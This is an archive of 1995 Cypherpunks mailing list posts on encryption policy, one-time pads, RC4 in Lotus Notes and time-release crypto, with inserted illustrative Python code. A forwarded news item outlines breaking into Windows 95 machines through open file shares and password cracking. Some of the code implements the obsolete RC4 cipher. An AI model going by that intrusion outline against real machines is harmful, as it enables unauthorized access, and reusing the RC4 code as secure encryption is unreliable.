From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Tue, 14 Nov 1995 02:57:43 +0800
To: cypherpunks@toad.com
Subject: New World Encryption
Message-ID: <Pine.BSD.3.91.951110214435.24482E-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
An item in 11 09 95 Edupage summarizes a NY Times new- 
sstory revealing Clinton's wish to spy on the world: 
 
OPPOSITION TO ADMINISTRATION'S ENCRYPTION STAND 
 
A coalition of 37 major U.S. technology companies has re- 
jected the Clinton Administration's proposed standard for 
data encryption, saying that they found Administration of- 
ficials unwilling to compromise. 
 
The government wants an encryption plan that will allow it 
to gather intelligence overseas, through the use of a key 
                       ^^^^^^^^ 
escrow encryption system. 
 
The high-tech companies want an encryption standard that 
would ensure privacy for both domestic and overseas users. 
                         ^^^^              ^^^^^^^^ 
(New York Times 8 Nov 95 C3) 
 
Their opposition to the Administration's plan has been joined 
by 12 conservative organizations who call it anti-consumer, 
anti-marketplace, and anti-progress.  (New York Times 9 Nov 
95 C3) 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  To subscribe to Edupage: send a message to: 
 
                  listproc@educom.unc.edu 
 
       and in the body of the message type: 
 
    subscribe edupage <your first name> <your last name> 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 13 Nov 1995 17:26:23 +0800
To: cypherpunks@toad.com
Subject: Re: POTP Security
Message-ID: <199511110657.WAA04599@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 19:30 11/10/95 -0500, jgrubs@left.webcasters.com wrote:
>>The first commercially available implementation of our 
>>POTP (Power One Time Pad) encryption algorithm. The package includes 
>>a POTP Secure FTP Client, POTP Secure FTP Server, and POTP FileCrypt - 
>>a stand alone file encryption program.
>What level of security does this cute, little puppy provide???

Since they advertize One Time Pad security, the first thing I want to know
is how they distribute their keys.  One Time Pads require a key as long as
the enciphered message.  A one-time-pad system without a convincing story
about key distribution is bullshit.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA
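
Added example (not part of the archived message and not POTP's code): a minimal one-time pad in Python showing the two constraints the post relies on, that pad material is consumed byte for byte by the traffic and that covering two messages with the same pad bytes exposes their XOR. The PadBook class, the helper names and the sample messages are constructed for illustration.

```python
import secrets


class PadExhausted(Exception):
    """Raised when a message needs more pad bytes than remain."""


def xor_bytes(a: bytes, b: bytes) -> bytes:
    if len(a) != len(b):
        raise ValueError("operands must be the same length")
    return bytes(x ^ y for x, y in zip(a, b))


class PadBook:
    """One party's copy of pre-shared pad material (hypothetical helper).

    Both parties must hold identical copies, delivered over a channel the
    adversary cannot read, before any message is sent. Bytes are consumed
    strictly once, in order.
    """

    def __init__(self, pad: bytes):
        self._pad = pad
        self._used = 0

    def remaining(self) -> int:
        return len(self._pad) - self._used

    def _take(self, n: int) -> bytes:
        if n > self.remaining():
            raise PadExhausted(f"need {n} pad bytes, only {self.remaining()} left")
        chunk = self._pad[self._used:self._used + n]
        self._used += n
        return chunk

    def encrypt(self, message: bytes) -> bytes:
        # Every plaintext byte costs exactly one fresh pad byte.
        return xor_bytes(message, self._take(len(message)))

    # Decryption is the same XOR against the receiver's own copy of the pad.
    decrypt = encrypt


def pad_reuse_leak(pad: bytes, first: bytes, second: bytes) -> bytes:
    """XOR of two ciphertexts made with the same pad bytes (the pad cancels)."""
    c1 = xor_bytes(first, pad[:len(first)])
    c2 = xor_bytes(second, pad[:len(second)])
    n = min(len(c1), len(c2))
    return xor_bytes(c1[:n], c2[:n])


def demo():
    # Constructed sample traffic.
    m1 = b"wire 40000 to account 7731"
    m2 = b"confirm receipt by Friday."
    # The shared pad is deliberately 4 bytes too short for both messages.
    shared = secrets.token_bytes(len(m1) + len(m2) - 4)
    sender, receiver = PadBook(shared), PadBook(shared)

    round_trip_ok = receiver.decrypt(sender.encrypt(m1)) == m1
    try:
        sender.encrypt(m2)
        ran_out = False
    except PadExhausted:
        ran_out = True  # no more traffic until more pad is delivered

    n = min(len(m1), len(m2))
    reuse_exposes_xor = pad_reuse_leak(shared, m1, m2) == xor_bytes(m1[:n], m2[:n])
    return round_trip_ok, ran_out, reuse_exposes_xor


if __name__ == "__main__":
    print(demo())
```
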






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Tue, 14 Nov 1995 06:12:28 +0800
To: cypherpunks@toad.com
Subject: Re: New World Encryption
In-Reply-To: <acc9550f0102100474a5@[205.199.118.202]>
Message-ID: <Pine.BSD.3.91.951110231009.24482G-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
Someone writes: 
 
 We are already becoming a kind of "automatic cc:" for a 
 variety of announcements, spams, and other earthshatter- 
 ing items. 
 
 
Someone may wish to include among these the document "Wel- 
come to the cypherpunks mailing list!" 
 
If so, then before he discards it, here are some excerpts 
from that document: 
 
 ...cypherpunks deals with technical details but slants the 
 discussion toward their social implications. 
 
 ...the debates on this list are about how to best get crypto 
 out there. 
 
 Cypherpunks do not seek to prevent other people from speak- 
 ing about their experiences or their opinions.
 
 Cypherpunks hope that all people desiring privacy will learn 
 how best to defend it. 
 
 
Cordially, 
 
Jim 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Tue, 14 Nov 1995 04:38:46 +0800
To: cypherpunks@toad.com
Subject: Who needs time vaults anyway?
Message-ID: <199511110715.AAA21835@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I don't really understand the use for "can't be opened until
Christmas" tricks.  If you don't want anyone to see your info until
Christmas then just don't give them a copy until then!  If you want
to prove that you have it but not let them see it until later then
do timestamping of hashes, zero-knowledge proofs and so forth.


Can anyone explain what use this theoretical "time-sensitive" crypto
box would be good for?


Regards,

Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://www-ugrad.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMKRNe/WZSllhfG25AQGXxAP9HuZU4tJZ92c4keUHbpSNjWcwyYhTOOWA
Atz/Ej8y0Q6xAwRdr2ggqYc7tgWUGMjGZy0vIoET9W6ofkXXnyZzUIFACzXuS7IK
8xOV740ShvnX//5j8x1TMOJuykRNrs0+y8eZI8gDLQ5R1vEEbv7JkmsVVUgdZpau
WMR6cG/9qu4=
=v4q/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Tue, 14 Nov 1995 06:16:40 +0800
To: cypherpunks@toad.com
Subject: Re: POTP Security
In-Reply-To: <gate.RXLDeD1w165w@left.webcasters.com>
Message-ID: <Pine.BSD.3.91.951111001407.24482H-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
On 11 10 95 jgrubs@left.webcasters.com inquired about POTP 
security: 
 
 What level of security does this cute, little puppy provide??? 
 
 
One approach to answering that inquiry is an excerpt from: 
 
 Date: Sat, 21 OCT 95 10:58:51 -0500 
 From: Paul Jackman <jacktech@delphi.com>
 Newsgroups: talk.politics.crypto
 Subject: Re: Elementrix One-Time Pad 

 
 ...mine [Jackman's background and experience] goes back to 1961 
 as Crypto Communications Control Command Center Supervisor for 
 the National Security Agency (NSA), and US Army Intelligence
 Security.  Even so, I do not consider myself expert in either the 
 technical sense or the historical sense.  But, I know enough not 
 to comment on algorithms that I don't have access to.
 
 The algorithm will be published when patent protection is assured.
 It is currently patent pending in several countries.
 
 As far as marketing goes, this product is not going to disappear.
 We have been premarketing security technology for four years through
 beta, and one year in pilot with international Fortune 100 companies.
 The initial presentations on Internet about a year ago showed us that
 the newness and complexity of the Algorithm had to be presented
 one on one to the experts which Elementrix has done.  There is a 
 long parade of companies that have implemented this technology but 
 do not wish to be named, (Typical of any security implementation.)
 Those who do acknowledge the integrity of the products are noteworthy, 
 Allen Brill Kroll Assoc., Al Decker Coopers & Lybrand, Todd Sun
 Mergent, and there will be many more.
 
 Paul Jackman
 
 
I silently corrected capitalization and spelling in the above ex- 
cerpt. 
 
I do not understand the import of the expression "expert in either 
the technical sense or the historical sense." 
 
 
Cordially, 
 
Jim 
 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Atp3000@aol.com
Date: Mon, 13 Nov 1995 17:18:39 +0800
To: cypherpunks@toad.com
Subject: Re: coding and nnet's
Message-ID: <951111003859_103654167@mail06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for your input.  Thus, it does make a lot of sense after some
explanation.
Atp3000




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 14 Nov 1995 04:33:28 +0800
To: bryce@colorado.edu
Subject: Re: Who needs time vaults anyway?
In-Reply-To: <199511110715.AAA21835@nagina.cs.colorado.edu>
Message-ID: <199511110843.AAA18344@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Can anyone explain what use this theoretical "time-sensitive" crypto
> box would be good for?

	Suppose you die.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas Junker" <tjunker@phoenix.phoenix.net>
Date: Mon, 13 Nov 1995 17:17:12 +0800
To: cypherpunks@toad.com
Subject: Re: mailing list.
Message-ID: <199511110707.BAA04164@phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


On 10 Nov 95 at 13:34, David.Y@freedomnet.com (David Y) wrote:

> Subject:       mailing list.

> Please put me on your mailing list, thanks.

Sure.  Consider it done.

-------------------------
Weak attempt at crypto relevance:

Couldn't trusted date/time-stamping signing robots be used
to establish that offline ecash particles had reached
certain points in their journey?  Might not a bank say
that in the event of a dispute, it will accept the ecash
copy signed earliest by Framis Signer or specified
alternate with claimant's ID inside the disposable
signature wrapper?  I suppose one might just as well 
authenticate the ecash with the bank itself, except that 
the signed copy allows withholding identity unless and 
until there is a dispute.


 ------------ http://www.phoenix.net/~tjunker ------------
| Your freedom is on the auction block.  What do you bid? |
 ---------------------------------------------------------
Unofficial Wang VS Information Center




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 13 Nov 1995 16:33:42 +0800
To: cypherpunks@toad.com
Subject: Love Bugs
Message-ID: <199511110054.BAA15772@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



The Nov 11 WSJ reports on the scare tactics of security
consultants in the U.S. and by their co-conspiring
counterparts -- spies -- abroad:

Richard Heffernan, an information-security specialist for
30 years, said his clients sometimes return to their
hotel rooms to find their belongings ransacked,
especially in Europe. Some European companies will pay as
much as $10,000 for the laptop of a Fortune 500
executive, he adds.

Watch out for tiny surveillance tools. In 1992, the
Canadian government reportedly warned businessmen that
the French intelligence service was bugging airline seats
and using undercover agents as flight attendants.
Penlight cameras placed above airline seats can make
readable photos of laptop screens.

Spies on planes can overhear conversations from several
seats away. Look for them in business suits with plenty
of luggage, says security consultant Kevin Coffey. "These
guys fit in."

Another consultant estimates that 45% of bugs are on fax
machines, and one group of U.S. executives inadvertently
gave their secrets to the competition by using the fax
machine at Moscow's upscale Metropol Hotel, which is
staffed with former FBI and KGB operatives.

If you are carrying extremely sensitive information, be
especially paranoid.

All this may be too much for some companies, who say they
don't have time to evade possible spies. Rather than take
the trouble, some companies end up postponing business
plans abroad, saying, "Forget it. We'll come back in a
few years."

That's what they said at the office, now listen to the bug
up Gigi's.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bglassle@kaiwan.com (Bob Glassley)
Date: Mon, 13 Nov 1995 17:13:41 +0800
To: Charlie Kaufman/Iris <Charlie_Kaufman/Iris.IRIS@iris.com>
Subject: Re: Lotus Notes RSA Implementation Question
In-Reply-To: <9511102035.AA6927@moe.iris.com>
Message-ID: <199511110613.WAA18615@kaiwan.kaiwan.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 10 Nov 95 11:15:42 EDT, Charlie Kaufman wrote:

>>1)  What is the key size used by the USA licensed version?
>>
>Notes V3 (the one currently deployed) uses 512 bit RSA keys in both the USA
>and exportable versions. Notes V4 (currently in Beta) uses 512 bit RSA keys for
>encryption in the exportable version and bigger keys for signatures in all
>versions and for encryption in the USA version. I'm not sure I'm allowed to say
>what the key size will be ahead of the product shipping.

I would assume since they are using a key size >40 bit, it is used for
authentication only, not for data encryption, that would skirt the ITAR
regs.  In fact according to the docs, there is no data encryption when
connecting to an international version server, regardless of the
client version.

I would assume that a >512 bit key in V4 would allow upwards of 1024
or better.  That should be sufficient for now.

>>2)  Considering RC4 is a proprietary scheme, have there been any
>>concerted efforts to validate its strength or lack of?  If so, could
>>you give a pointer to any documents I could review.
>>
>There has been considerable discussion of the security of RC4 on this list, and
>some subtle (i.e. worrisome but not disastrous) weaknesses have been
>found. Lotus Notes' use of RC4 is not subject to the weaknesses disclosed
>to date because it does not encrypt recognizable plaintext with the first few
>bytes of the RC4 stream.

My understanding was that the problems exposed with RC4 that you
mentioned, were with the particular implementation by Netscape.  I
guess I better go back to the archive and do some reading. :-)

Thanks, for the info.

Bob Glassley


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKQ+hW7xvKhVs/sNAQFgfgP+Jekr28ZImaynnvuEpbZu5imS0Jm8bPwQ
iDw0ZIcF23ngSjb1Z4srt9cSJmL1zV2dEFyxSlXs7CWzBmlw8dSCvz6ArftetRYY
aYe1qwt+bXpGMWplQKUOG/dNk/n52sn1mHNPEJoj/V4G4iAXfDoOokL+zdSJ1Cbk
LuFl+F1M/Zc=
=FHxS
-----END PGP SIGNATURE-----
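
Added example (not part of the archived message and not Lotus Notes code): the quoted reply says Notes does not encrypt recognizable plaintext with the first few bytes of the RC4 stream. One way to get that property is to discard the leading keystream bytes, shown here in Python; the drop count of 256, the key and the sample message are assumptions chosen for illustration.

```python
DROP = 256  # assumed discard count; the message only says "the first few bytes"


def rc4_keystream(key: bytes, length: int, drop: int = 0) -> bytes:
    """Return `length` RC4 keystream bytes after discarding the first `drop`."""
    if not 1 <= len(key) <= 256:
        raise ValueError("RC4 keys are 1 to 256 bytes long")
    # Key-scheduling algorithm: permute 0..255 under control of the key.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # Output generation; the first `drop` outputs are computed and thrown away.
    out = bytearray()
    i = j = 0
    for n in range(drop + length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        if n >= drop:
            out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_crypt(key: bytes, data: bytes, drop: int = 0) -> bytes:
    """Encrypt or decrypt (same operation) with optional keystream discard."""
    stream = rc4_keystream(key, len(data), drop)
    return bytes(d ^ k for d, k in zip(data, stream))


def observed_keystream(ciphertext: bytes, known_prefix: bytes) -> bytes:
    """Keystream bytes any observer learns when the message start is predictable."""
    return bytes(c ^ p for c, p in zip(ciphertext, known_prefix))


def demo():
    key = bytes.fromhex("0102030405")        # constructed sample key
    message = b"From: alice\nsee attachment"  # constructed sample message
    header = b"From: "                        # the recognizable plaintext

    plain_use = rc4_crypt(key, message)
    with_drop = rc4_crypt(key, message, drop=DROP)

    # Without the discard, the predictable header lines up with the very
    # first keystream outputs, the part of the stream the thread worries about.
    exposes_initial = observed_keystream(plain_use, header) == rc4_keystream(key, len(header))
    # With the discard, the same header only reveals outputs DROP bytes in.
    exposes_later = (observed_keystream(with_drop, header)
                     == rc4_keystream(key, DROP + len(header))[DROP:])
    round_trip = rc4_crypt(key, with_drop, drop=DROP) == message
    return exposes_initial, exposes_later, round_trip


if __name__ == "__main__":
    print(demo())
```
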






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an407769@anon.penet.fi (jerry the golden retriever)
Date: Mon, 13 Nov 1995 17:23:07 +0800
To: cypherpunks@toad.com
Subject: hacker's dream
Message-ID: <9511110629.AA27945@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Windows 95 Is A Hacker's Dream Over The Internet
CENTRAL, HONG KONG, 1995 NOV 9 (NB) -- Windows 95, combined with the
Internet, could be a dream made in hacker heaven. From seasoned propeller
heads Newsbytes has contacted, it looks like Windows 95 could be more of a
security nightmare than was first thought.

This is especially true where fixed link companies are concerned. An
investigation of the new operating system, when hooked onto the Internet,
leaves computers wide open. Executing a series of simple, uncomplicated
commands opens up company and private users' computers to hacking the moment
they access the Internet, claim some analysts.

Worse, they may never know it has been done. Using a simple Unix command, a
hacker can locate the IP (Internet protocol) address of the subscriber logged
into an Internet service provider. Then he needs only one more thing; a
logged-on Internet user using Microsoft's new operating system.

For businesses with leased line Internet links, it can happen at any time,
day or night. Once the IP address has been noted, the hacker simply creates a
file through DOS on his own system, specifying the address and naming it.
Using two other commands -- which purge the remote names on the IP, or
Internet provider's port -- the system then refreshes and remaps itself in
preparation to be accessed by the hacker's computer.

Because Windows 95 is designed with a networking capability, it leaves all
computers in the office open to illegal access. Once the hacker has called up
his Map Network Drive, the hard disk on his own machine cannot be
differentiated from that of the genuine user. All that need be done then is
to put in a common drive name, most obviously "C:\." For networked machines,
the default "C$" is common.

This gives access to all files on the subscriber's drive. While Windows 95
allows the user to protect the drive by giving it a password, computer
experts Newsbytes talked to said that device won't necessarily lock out
intruders. Because the operating system has no "audit" trail -- in other
words, it does not log who or how someone is accessing the drive -- a hacker
can spend weeks trying to discover the password. Password search programs,
like Cracker, are readily available and can break through most simple
password sequences.

(Joel McCormick & I.T. Daily/19951109)
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Fletcher <j.fletcher@psych.stir.ac.uk>
Date: Tue, 14 Nov 1995 04:32:02 +0800
To: cypherpunks@toad.com
Subject: Q: Bookshop in Seattle
Message-ID: <Pine.HPP.3.91.951111082012.10146A-100000@loyal.stir.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



  Can someone point me towards a bookshop in Seattle that is likely to
have the second edition of Applied Cryptography ? 

Sincerely,

-Jon

--
  Jonathon Fletcher, 
  j.fletcher@stirling.ac.uk 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Mon, 13 Nov 1995 10:26:26 +0800
To: cypherpunks@toad.com
Subject: "conspiracypunks"
Message-ID: <199511111515.JAA27130@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


May have been silenced, but the Slick criminality story
continues apace, and it's fitting that the most Nixonian
president since Tricky himself should have a "Deep Throat,"
no matter how some of you feel about Orlin, who is, BTW,
doing the job the media claims to be responsible for.
[Don't Flame C2]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andre Bacard <abacard@well.com>
Date: Tue, 14 Nov 1995 05:28:24 +0800
To: cypherpunks@toad.com
Subject: URL Version for ALPHA.C2.ORG FAQ
Message-ID: <199511111848.KAA22368@well.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello Remailer Users,
 
Due to popular demand, I've created a URL version of my ALPHA.C2.ORG
Remailer FAQ. Please link to this address:
 
      http://www.well.com/user/abacard/alpha.html
 
See you in the future,
Andre Bacard
======================================================================
abacard@well.com                    Bacard wrote "The Computer Privacy
Stanford, California                Handbook" [Intro by Mitchell Kapor].
http://www.well.com/user/abacard    Published by Peachpit Press, (800)
Enjoy your privacy...               283-9444, ISBN # 1-56609-171-3.
=======================================================================
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <klp@gold.tc.umn.edu>
Date: Tue, 14 Nov 1995 08:13:19 +0800
To: bryce@colorado.edu
Subject: Re: Who needs time vaults anyway?
In-Reply-To: <199511110715.AAA21835@nagina.cs.colorado.edu>
Message-ID: <30a4ebe65774002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


According to rumor, Bryce said:
> 
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> I don't really understand the use for "can't be opened until
> Christmas" tricks.  If you don't want anyone to see your info until
> Christmas then just don't give them a copy until then!  If you want
> to prove that you have it but not let them see it until later then
> do timestamping of hashes, zero-knowledge proofs and so forth.
> 
> 
> Can anyone explain what use this theoretical "time-sensitive" crypto
> box would be good for?

An application that I've seen is financial data, more specifically
MBS payment info. There is 100s of megabytes of data, and it was
encrypted so that nobody could use the info before the release
date/time, but the data needed to be transmitted prior to release
because of bandwidth constraints. In this case, it wasn't real
time-release, because the key was manually transmitted to release
the information rather than implement some sort of "do not decrypt
until" scheme.


-- 
Kevin L. Prigge        |"A computer lets you make more mistakes faster 
UofM Central Computing | than any invention in human history--with the 
email: klp@cis.umn.edu | possible exceptions of handguns and tequila."
01001101100010110010111|- Mitch Ratcliffe
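
Added example (not part of the archived messages): the two approaches from this thread in Python, Bryce's "timestamping of hashes" as a salted hash commitment that could be handed to a timestamping service, and the flow Kevin describes, where the bulk data is shipped encrypted ahead of time and only the short key is sent at release. The function names and sample data are constructed, and the SHAKE-256 keystream is a standard-library stand-in for a vetted authenticated cipher, which is what a real deployment would use.

```python
import hashlib
import hmac
import secrets

# Constructed sample standing in for the bulk payment data.
SAMPLE_REPORT = b"pool=0001;factor=0.91234567;paydate=1995-12-25\n" * 4


def commit(document):
    """Publish now, reveal later. Returns (commitment, nonce).

    The random nonce stops anyone from confirming a guess at a short or
    predictable document by hashing candidates. Only the commitment is
    published (or timestamped); nonce and document stay private until reveal.
    """
    nonce = secrets.token_bytes(32)
    return hashlib.sha256(nonce + document).digest(), nonce


def verify_commitment(commitment, nonce, document):
    expected = hashlib.sha256(nonce + document).digest()
    return hmac.compare_digest(commitment, expected)


def _subkeys(key):
    # Separate keys for encryption and for the integrity tag.
    return (hashlib.sha256(b"enc" + key).digest(),
            hashlib.sha256(b"mac" + key).digest())


def _xor_keystream(enc_key, nonce, data):
    # Stand-in stream cipher (assumption): SHAKE-256 output used as keystream.
    stream = hashlib.shake_256(enc_key + nonce).digest(len(data))
    return bytes(d ^ s for d, s in zip(data, stream))


def seal(data):
    """Before release: returns (package to distribute early, key to withhold)."""
    key = secrets.token_bytes(32)
    nonce = secrets.token_bytes(16)
    enc_key, mac_key = _subkeys(key)
    ciphertext = _xor_keystream(enc_key, nonce, data)
    tag = hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()
    return {"nonce": nonce, "ciphertext": ciphertext, "tag": tag}, key


def open_sealed(package, key):
    """At release: check the key against the package, then decrypt."""
    enc_key, mac_key = _subkeys(key)
    expected = hmac.new(mac_key, package["nonce"] + package["ciphertext"],
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, package["tag"]):
        raise ValueError("wrong key or modified package")
    return _xor_keystream(enc_key, package["nonce"], package["ciphertext"])


def demo():
    # Days before release: hundreds of megabytes could go out this way.
    package, key = seal(SAMPLE_REPORT)
    # Release time: only the 32-byte key has to be transmitted.
    recovered = open_sealed(package, key)

    commitment, nonce = commit(SAMPLE_REPORT)
    return (recovered == SAMPLE_REPORT,
            verify_commitment(commitment, nonce, SAMPLE_REPORT),
            verify_commitment(commitment, nonce, SAMPLE_REPORT + b"edited"))


if __name__ == "__main__":
    print(demo())
```

As in the message above, this is not real time-release: the sender still has to act at release time by sending the key.
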




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 14 Nov 1995 18:58:10 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again
Message-ID: <199511112036.MAA24650@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Nov 1995, Jeff Weinstein, self-styled "Electronic Munitions
Expert", from Netscape Communications: 

>> Meanwhile people are having their PGP keyrings collected, their passwords
>> monitored, and all of the information -- even information which they have
>> NOT posted to Usenet, information that is simply on their personal hard
>> drives, or on a private corporate network that is behind a firewall --
>> collected by anyone who actually understands *how* to use Netscape
>> Navigator's standard features to do it.
>
>  Please show us some proof.  All you have done is post unfounded
>allegations backed up by flawed logic and a misunderstanding of the
>technology.  Send me a URL, and I will point my navigator at it.  If you
>can collect my PGP key ring you can gloat here or anywhere else. 

I think "Jeff" ... Mr. unofficial not speaking for the company Netscape
spokesperson, I think that you should rethink what you're suggesting. 
Your tactics won't serve your personal interests on this one.  I really
would recommend that you come clean.  This is not about "gloating".  I 
really take very little pleasure in this.

It's really not a good plan, to suggest that I contravene your "license
agreement" or break the laws of my country to satisfy some ego-centred
game on your part not to face the FACT, that you have been caught. 

Not arrested yet, but you have been found out.

Or as I wrote some weeks ago, in some oddly inspired flash ... You're
"Hoist by your own 'petar" ... (which is a quote that Johnnie Cochran
used during the OJ trial ... a quote taken from Shakespeare which
*translated* means that you've been blown up by your own bomb.)

I am not nearly so *SLOW* as to offer you ammunition to use against me.
Your license agreement -- pardon me -- Netscape's license agreement
explicitly sets out the limitations under which I must function.  An 
agreement, I respect.  It states in part. 

> RESTRICTED USE.  You may not copy the software, except for backup or
> archival purposes.  Any such copy made by you shall be subject to this
> Agreement and shall contain all of Netscape's notices regarding
> copyrights, trademarks and other proprietary rights as contained in the
> Software originally provided to you.  You may not lend, rent, lease or
> otherwise transfer the Software.  The Software is protected by the
> copyright laws of the United States and international copyright
> treaties.

Ya see ... "Jeff" ... I actually respect that ... and I'll operate within
those constraints on this one.  Later the Agreement continues with more
legalistic boiler plate and says,

> TITLE.  Title, ownership rights, and intellectual property rights in
> and to the Software and Documentation shall remain in Netscape and/or
> its suppliers.  This Agreement does not include the right to sublicense
> the Software and is personal to you and therefore may not be assigned
> (by operation of law or otherwise) or transferred without the prior
> written consent of Netscape.  You acknowledge that the Software in
> source code form remains a confidential trade secret of Netscape and/or
> its suppliers and therefore you agree not to attempt to decipher,
> decompile, disassemble or reverse engineer the Software or allow others
> to do so, except to the extent applicable laws specifically prohibit
> such restriction.  You further agree not to modify or create derivative
> works of the Software.

Now how do you expect me ... poor little "Alice" ... to exploit KNOWN
documented and undocumented security holes in Netscape Navigator ... holes
which Netscape willfully and deliberately or alternatively through the
grossest of negligence, engineered into the product, when I have
implicitly agreed not to violate your License Agreement. 

My hands are kind of tied, aren't they "Jeff".  

I need written permission to do that, and considering that Netscape
hasn't even *bothered* to acknowledge email which was sent to them, email
which asked whether they will voluntarily open up their experimental MIME
objects to IETF review, I somehow doubt that permission will be
forthcoming. 

You can't suck and blow at the same time Jeff. 

Maybe, what I'll do ... is snail mail Netscape and ask for explicit
permission to do just that.  I'll also ask for access to all of the source
code, and maybe at the same time ask for the email address of Dr James H.
Clark, since the Netscape postmaster doesn't seem to reply to email.

After all, he DOES know about this issue, doesn't he??  Dr. James H. Clark 
has been briefed, I hope ...

Let's see ... Dr. James H Clark, founder of Silicon Graphics Inc, and 
co-founder of Netscape Communications Corp. does know about this "itsy 
bitsy" "teeny-weeny" problem doesn't he??  

I mean there _will_ be questions as to what he knew and when he knew it and
what he did about it.  But that'll be his baby ... and I'll let him speak 
for himself on that one. 

But the other question ... the question of what the other co-founder of
Netscape Communications Corp., Marc Andreessen, knew is not a subject for 
speculation.  We know that.

Marc Andreessen, vice-president of technology at Netscape, and creator of 
NCSA Mosaic's knowledge is clear.  We "know" what Marc knew. 

Marc won't be able to pull an "Ollie North" and redact the public domain
electronic archives.  It's clear what he knew and when he knew it. 

A simple one line command tells all ... a command like, maybe:

           mget rfc* |grep Andreessen

run at one of the public domain archives might give us some clues and
pointers to anyone who might be familiar with how the net works.  Then a
little follow up and search of some mailing lists ... lists of the
Internet Engineering Task Force ... cross-referencing the records of the
IETF might tell us what Marc knew and when. 

NOTHING which has been written, is gone, is it Jeff??  There are no hidden
acts, and there are no solitary acts when it comes to the Network.  And 
isn't that a shame, "Jeff"??

But then what would I know about such things ... I don't *understand* the 
technology, do I "Jeff", my boy??

Simple question, once again ... does Netscape have any comment to make?  
Or does it continue to say "no comment".  

Will Dr. James H. Clark, and/or Marc Andreessen please step forward 
and address this issue at this time?  The international community is 
beginning to lose its patience.


> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.


Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Tue, 14 Nov 1995 05:33:21 +0800
To: sameer <sameer@c2.org>
Subject: Re: Who needs time vaults anyway?
In-Reply-To: <199511110843.AAA18344@infinity.c2.org>
